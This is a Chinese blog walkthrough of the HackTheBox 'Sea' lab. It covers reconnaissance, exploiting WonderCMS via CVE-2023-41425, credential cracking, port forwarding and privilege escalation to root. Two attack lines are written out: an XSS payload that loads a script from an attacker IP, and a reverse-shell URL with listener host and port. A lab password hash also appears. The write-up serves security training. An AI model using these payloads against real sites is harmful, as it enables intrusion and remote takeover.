记一次渗透测试实战之Sea

最新推荐文章于 2025-06-29 19:24:14 发布

原创最新推荐文章于 2025-06-29 19:24:14 发布 · 356 阅读

4 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全 #信息安全 #渗透测试

Web渗透

端口扫描

使用nmap进行端口探测

发现存在22和80端口开放。

访问80端口，然后使用F12查看源代码。

目录爆破

接着使用工具爆破目录
发现存在一些目录。
访问README.MD，发现是WonderCMS

CVE搜索

使用浏览器搜索，发现存在CVE漏洞。

访问contact.PHP.

SSRF漏洞

测试功能点。

发现存在SSRF漏洞。

CVE-2023-41425

接着访问index.php?目录

漏洞尝试

http://sea.htb/index.php?page=loginURL"></form><script src="http://10.10.16.3:8000/xss.js"></script><form action="

使用exp.py脚本尝试，发现未能攻击成功。

访问发现不能成功利用。
http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.16.3&lport=4444

查看JS文件。

获取Webshell

修改之后，重新尝试，成功获取shell。

获取交互式SHELL。

横向移动

内网信息收集

然后进行内网信息收集。

查看/etc/passwd

查看数据库文件。

查看目录。

获取数据库文件

测试localhost

查看数据库文件，获取password。

hash解密

"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
使用hashcat解密，获取密码。

接着使用netexec验证ssh吗密码。

ssh登录

使用SU进行切换。

代理搭建

接着搭建代理。

搭建客户端。

访问web站点。

漏洞尝试

发现可以进行文件读取。

文件读取

然后读/etc/password

测试发现存在SQL注入

确定分组权限。

获取root权限

然后添加用户到管理员组，获取root权限。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

网络安全工程师老王

关注关注

4
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

PostgreSQL 安全纵深防御：从权限到加密

在技术的广袤天地里，本博客如精准罗盘。剖析前沿科技，深掘代码奥秘，以精炼笔触，带您穿越复杂技术迷宫，速达知识彼岸。

06-02

2803

《PostgreSQL安全纵深防御体系解析》摘要 PostgreSQL作为企业级开源数据库，其安全机制包含四大核心：角色权限、行级安全(RLS)、传输加密和审计追踪。文章深度剖析权限管理的三层架构（角色-对象-列级权限），通过金融案例展示GRANT/REVOKE实战技巧；详解RLS在多租户场景下的应用，包括医疗数据的医生-患者隔离策略；同时提供性能优化方案，如策略索引和BYPASSRLS权限。全文构建从宏观权限到微观数据控制的立体防御体系，并强调最小权限原则和审计追踪的关键作用，为高敏感数据环境提供企业级安

AI在海洋科学中的应用：Nature最新研究

AI天才研究院

06-18

424

本文旨在系统性地介绍人工智能技术在海洋科学研究中的最新应用，特别是Nature期刊近期发表的相关突破性成果。研究范围涵盖机器学习、深度学习在海洋观测、数据分析、模型预测等多个方面的应用。文章首先介绍背景知识，然后深入探讨核心概念和算法原理，接着通过实际案例展示应用效果，最后讨论未来趋势和挑战。海洋遥感(Ocean Remote Sensing): 利用卫星、飞机等平台上的传感器获取海洋信息的技术浮游生物(Plankton): 海洋中随水流漂移的微小生物群落涡旋(Eddy)

参与评论您还未登录，请先登录后发表或查看评论

HTB：Sea[WriteUP]

如有错误感谢斧正

11-14

1537

查看Github上的LICENSE文件可以发现与我们FUZZ到的文件内容是一模一样的。由于不知道该密码对哪个用户有效，所以我们查看一下系统内支持登录的用户。可见靶机内部是开放了8080端口，我尝试通过SSH服务将其转发到本地。我尝试直接往靶机/etc/passwd文件中加入无密码管理员用户。端口转发后使用浏览器直接访问，上来就提示需要认证。使用cat命令查看其内容里面有一串哈希密码。在靶机中再次查看/etc/passwd文件。将三个用户名写入users.txt文件中。使用该凭证通过SSH服务登录到靶机。

Sea WrtieUp

m0_47720310的博客

09-12

1278

CVE-2023-41425、内网穿透、suid提权

渗透测试的8个步骤展现一次完整的渗透测试过程及思路

04-10

1461

渗透测试这个事情不是随便拿个工具就可以做了，要了解业务还需要给出解决方案。之前安全加介绍了金融行业实战微信银行渗透测试，运营商渗透测试实战，今天让我们来说说渗透测试的流程及渗透测试相关概念。 渗透测试流程 渗透测试与入侵的最大区别 渗透测试：出于保护系统的目的，更全面地找出测试对象的安全隐患。入侵：不择手段地（甚至是具有破坏性的）拿到系统权限。一般渗透测试流程流程...

seafaring靶场渗透测试

2301_81525518的博客

09-13

872

进来这里有个框尝试xss没有那咱们就来试试搜索行注入这里有东西说明闭合成功，接着就order by 有三列三个地方都有回显查看数据库这里查表发现只有两个先去看看admin先来看看列然后看用户密码，这里密码直接显示出来了。

msf渗透测试学习-与永恒之蓝漏洞案例

weixin_49349476的博客

06-08

5544

MSF是Metasploit Framework的缩写，是一款广泛使用的渗透测试工具，具有强大的攻击功能。它提供了一个模块化的平台，通过将各种攻击载荷、漏洞利用和辅助工具组装在一起，可用于模拟各种攻击，测试系统安全性，也可以用于执行红队实战训练、漏洞挖掘等工作。

【云渗透】云渗透和云服务的基础知识

Ohh24的博客

03-03

1040

在学习对云服务器渗透前学习的一些基本知识，以便更好了解云服务器渗透

yakit-靶场-高级前端加解密与验签实战（for嵌套纯享版）

qq_22792465的博客

12-30

1488

使用hmac-sha256的十六进制key值可以加密与页面加密后的值相同。

社会工程渗透测试教程（一）

龙哥盟

04-21

1503

我依然清晰地记得当我坐下来开始在写框架时的情景。我在互联网上搜索我想要涵盖的主题的有用提示。然而，社会工程当时并不是一个热门话题。我可以找到关于从驶入式快餐店获得免费食物或者追求女孩的视频……但没有关于安全的。在我写框架的同时，我努力尝试在我所做的任何安全工作中包含社会工程。大多数时候，公司会说：“为什么要尝试呢？我们知道我们会失败。”或者“像那样的事情绝不可能对我起作用！我甚至曾经不惜免费提供服务，只是为了证明社会工程是多么危险。现在几年过去了，人们每天都在通过电子邮件和电话询价社会工程工作。

LAMPSecurityCTF5---靶机练习

Blanks的博客

01-14

1264

带你去体验最真实的渗透环境，文章里不会直接摆答案，会全面的带你去进行信息收集以及漏洞利用，会领着你一步一步踩下我踩过的坑，实战往往比这更绝望，练技术须实践。

SEA_Hacks：Python编程实战指南

由于描述中提到了“测试”，我们可以推断这是一个包含渗透测试或漏洞评估内容的项目。描述：“SEA_HACKS 测试”表明这个项目可能是一个测试框架或测试集，用以评估系统、应用程序或其他技术的漏洞和弱点。它也可能...

容器防火墙实战：Falco+Calico阻断0day攻击

python，运维，测试，数据分析，人工智能

06-29

870

摘要：本文针对容器安全痛点，提出基于Falco和Calico的立体防护方案，覆盖漏洞利用、挖矿程序拦截等场景。通过部署Calico实现网络隔离，Falco监控系统调用行为，提供可直接落地的安全规则（如阻断挖矿程序、SQL注入）。实验证明该方案能有效检测0day攻击并自动隔离受感染Pod，帮助中小团队零成本构建容器安全防线。

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8813

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

基于多任务级联卷积神经网络CNN的联合人脸检测与对齐

11-11

基于多任务级联卷积神经网络的联合人脸检测与对齐

道法网安一组.pptx

最新发布

11-11

道法网安一组.pptx

电力系统基于线性回归与MATLAB的负荷预测模型：多源数据驱动的城市电网智能调度系统设计 MATLAB实现基于线性回归（LR）进行电力负荷预测的详细项目实例（含完整的程序，GUI设计和代码详解）

11-11

内容概要：本文详细介绍了一个基于MATLAB实现的线性回归（LR）电力负荷预测项目实例，涵盖了从项目背景、模型架构、算法流程、代码实现到GUI界面设计的完整开发过程。项目通过整合历史负荷、气象数据、节假日信息等多源变量，构建多元线性回归模型，并结合特征工程、数据预处理、正则化方法（如岭回归、LASSO）和模型评估指标（RMSE、MAPE、R²等），提升预测精度与泛化能力。文中还展示了系统化的项目目录结构、自动化部署脚本、可视化分析及工程集成方案，支持批量预测与实时滚动更新，具备高度模块化、可解释性强、部署友好的特点。; 适合人群：具备一定MATLAB编程基础，从事电力系统分析、能源管理、智能电网或数据建模相关工作的工程师、研究人员及高校师生。; 使用场景及目标：①应用于城市电力调度、新能源消纳、智能楼宇用能管理等场景下的短期负荷预测；②帮助理解线性回归在实际工程项目中的建模流程、特征处理与模型优化方法；③通过GUI界面实现交互式预测与结果可视化，支持工程落地与决策辅助；阅读建议：建议结合提供的完整代码与GUI示例进行实践操作，重点关注数据预处理、特征构造、正则化调优与模型评估部分，深入理解各模块的设计逻辑与工程封装思路，以便迁移到类似的时间序列预测任务中。

（43页PPT）麦肯锡企业数据架构数据治理设计规划咨询项目建议P43.pptx

11-11

（43页PPT）麦肯锡企业数据架构数据治理设计规划咨询项目建议P43.pptx

Seagull信令模拟器：IMS EPC协议的压力测试指南

Seagull作为一款功能强大的IMS EPC信令模拟器，它不仅提供了协议测试的能力，还简化了新协议的支持过程，大大降低测试门槛，是通信网络开发者和测试人员的得力工具。通过深入学习Seagull的使用文档和开发手册，...